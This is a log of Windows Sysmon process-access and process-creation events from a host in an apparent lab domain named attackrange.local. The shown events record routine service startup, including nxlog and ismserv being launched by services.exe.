{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.869\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.869","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.870\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.870","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.870\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.870","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.870\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.870","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.872\r\nProcessGuid: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nProcessId: 2884\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.872","ProcessGuid":"{41C8662E-1F73-5F25-0000-00108BBC0200}","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.873\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.873","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.874\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.874","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.873\r\nProcessGuid: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nProcessId: 2856\r\nImage: C:\\Windows\\System32\\ismserv.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Intersite Messaging Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ismserv.exe\r\nCommandLine: C:\\Windows\\System32\\ismserv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.873","ProcessGuid":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","Image":"C:\\Windows\\System32\\ismserv.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Intersite Messaging Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"ismserv.exe","CommandLine":"C:\\Windows\\System32\\ismserv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.875\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.875","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
